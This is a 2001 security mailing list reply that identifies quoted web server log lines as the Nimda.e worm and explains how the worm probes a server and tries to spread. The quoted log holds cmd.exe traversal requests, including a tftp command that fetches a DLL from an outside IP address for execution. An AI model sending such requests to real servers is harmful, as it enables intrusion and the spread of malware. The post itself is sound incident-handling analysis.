Security Incidents mailing list archives
Re: New Worm Variant?
From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 30 Oct 2001 10:08:42 -0700 (MST)
On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:09:11 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
As someone pointed out, this is Nimda.e . What's going on here is that since your web server is responding with a 200 to the exploit attempt, it thinks it has found a vulnerable victim. So it issues the tftp command to try and make your web server download a copy. Then it sends a command to try to execute the file it thinks it has caused you to download. Ryan ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New Worm Variant? Aj Effin Reznor (Oct 30)
- Re: New Worm Variant? Ryan Russell (Oct 30)
- <Possible follow-ups>
- RE: New Worm Variant? Kester, Kelly (Oct 30)